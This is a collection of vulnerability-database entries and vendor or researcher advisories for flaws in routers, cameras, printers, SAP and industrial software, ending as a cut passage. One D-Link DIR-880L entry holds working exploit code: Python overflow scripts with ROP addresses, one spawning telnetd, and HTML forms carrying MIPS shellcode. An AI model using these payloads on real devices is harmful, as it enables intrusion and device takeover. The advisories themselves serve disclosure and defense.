|
var-200607-0396
|
Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability:
DELTAINTERVAL
LOGFOLDER
DELETELOGS
FWASERVER
SYSLOGPUBLICIP
GETFWAIMPORTLOG
GETFWADELTA
DELETERDEPDEVICE
COMPRESSRAWLOGFILE
GETSYSLOGFIREWALLS
ADDPOLICY
EDITPOLICY.
-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:
http://www.tippingpoint.com/security
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service. ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
July 25, 2006
-- CVE ID:
CVE-2006-3838
-- Affected Vendor:
eIQnetworks
-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since by Digital Vaccine protection
filter ID N/A.
Authentication is not required to exploit this vulnerability.
-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
- Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of
Bastard Labs.
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
var-202308-3520
|
TP-Link Tapo C210 ActiveCells Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Tapo C210 IP cameras. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
The specific flaw exists within the handling of the ActiveCells parameter of the CreateRules and ModifyRules APIs. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20589. TP-LINK Tapo C210 is a network camera device from China's TP-LINK company |
|
var-202310-1968
|
An issue found in D-Link DSL-3782 v.1.03 and before allows remote authenticated users to execute arbitrary code as root via the Router IP Address fields of the network settings page. D-Link Systems, Inc. of DSL-3782 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state |
|
var-202312-0648
|
TP-Link TL-WR841N dropbearpwd Improper Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of TP-Link TL-WR841N routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from improper authentication. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-19899 |
|
var-201112-0173
|
The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03102449
Version: 3
HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-11-30
Last Updated: 2012-01-09
Potential Security Impact: Remote firmware update enabled by default
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential security vulnerability has been identified with certain HP printers and HP digital senders.
References: CVE-2011-4161
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Please refer to the RESOLUTION
below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication.
RESOLUTION
The following steps can be taken to avoid unauthorized firmware updates:
Update the firmware to a version that implements code signing
Disable the Remote Firmware Update
The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates.
Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows.
Browse to www.hp.com/go/support then:
Select "Drivers & Software"
Enter the product name listed in the table above into the search field
Click on "Search"
If the search returns a list of products click on the appropriate product
Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)"
If the "Cross operating system ..." link is not present, select any Windows operating system from the list.
Select the appropriate firmware update under "Firmware"
HISTORY
Version:1 (rev.1) - 30 November 2011 Initial release
Version:2 (rev.2) - 23 December 2011 Code signing firmware available
Version:3 (rev.3) - 9 January 2012 Combined tables
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU
VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg
=mXzy
-----END PGP SIGNATURE-----
. However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices |
|
var-202303-1251
|
TP-Link Archer AX21 tdpServer Logging Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Archer AX21 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the logging functionality of the tdpServer program, which listens on UDP port 20002. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19898. TP-LINK Archer AX21 is a wireless router from China's TP-LINK company |
|
var-201803-1810
|
A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition.
Versions prior to DOPSoft 4.00.04 are vulnerable |
|
var-201807-0341
|
ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IPAddress parameters of the ABB BEControlLogix OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland |
|
var-201011-0225
|
Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple
Vulnerabilities
SECUNIA ADVISORY ID:
SA42146
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42146/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42146
RELEASE DATE:
2010-11-09
DISCUSS ADVISORY:
http://secunia.com/advisories/42146/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42146/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42146
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Intelligent Contact
Manager Setup Manager, which can be exploited by malicious people to
compromise a vulnerable system.
1) A boundary error within Agent.exe when handling the
"HandleUpgradeAll" packet can be exploited to cause a stack-based
buffer overflow via a specially crafted request sent to e.g. TCP port
40078.
2) A boundary error within Agent.exe when handling the "AgentUpgrade"
packet can be exploited to cause a stack-based buffer overflow via a
specially crafted request sent to e.g. TCP port 40078.
3) A boundary error within Agent.exe when handling the
"HandleQueryNodeInfoReq" packet can be exploited to cause a
stack-based buffer overflow via a specially crafted request sent to
e.g. TCP port 40078.
4) A boundary error within Agent.exe when handling the
"HandleUpgradeTrace" packet can be exploited to cause a stack-based
buffer overflow via a specially crafted request sent to e.g. TCP port
40078.
Please see the vendor's advisory for the list of affected versions.
SOLUTION:
The vendor recommends to delete the Agent.exe file or restrict
network access to the affected service.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
sb, reported via ZDI.
ORIGINAL ADVISORY:
Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=21726
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-232/
http://www.zerodayinitiative.com/advisories/ZDI-10-233/
http://www.zerodayinitiative.com/advisories/ZDI-10-234/
http://www.zerodayinitiative.com/advisories/ZDI-10-235/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-232
November 7, 2010
-- CVE ID:
CVE-2010-3040
-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors:
Cisco
-- Affected Products:
Cisco Unified Intelligent Contact Management
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9915.
-- Vendor Response:
Cisco has issued an update to correct this vulnerability. More
details can be found at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=21726
-- Disclosure Timeline:
2010-06-01 - Vulnerability reported to vendor
2010-11-07 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* sb
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
|
|
var-201507-0645
|
D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment.
A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information
Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
.
## Details
# Ping buffer oberflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline |
|
var-202307-1219
|
NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.
The specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725 |
|
var-201112-0297
|
Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions |
|
var-201809-0087
|
WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of UMP files. When parsing the EventSet WordAddr element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China |
|
var-201103-0371
|
SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks |
|
var-202001-0833
|
A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code.
Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions.
The following products are affected:
SAP Netweaver 2004s
SAP Netweaver 7.01 SR1
SAP Netweaver 7.02 SP06
SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
CORE-2012-1128
1. *Advisory Information*
Title: SAP Netweaver Message Server Multiple Vulnerabilities
Advisory ID: CORE-2012-1128
Advisory URL:
http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities
Date published: 2013-02-13
Date of last update: 2013-02-13
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Improper Validation of Array Index [CWE-129], Buffer overflow
[CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1592, CVE-2013-1593
3. By sending different messages,
the different vulnerabilities can be triggered.
4. *Vulnerable packages*
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note 1800603 [2] regarding these issues.
7. *Credits*
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and
Francisco Falcon, and additional research was performed by Francisco
Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by
Martin Gallo from Core Security Consulting Services. The publication of
this advisory was coordinated by Fernando Miranda from Core Advisories
Team.
8. *Technical Description / Proof of Concept Code*
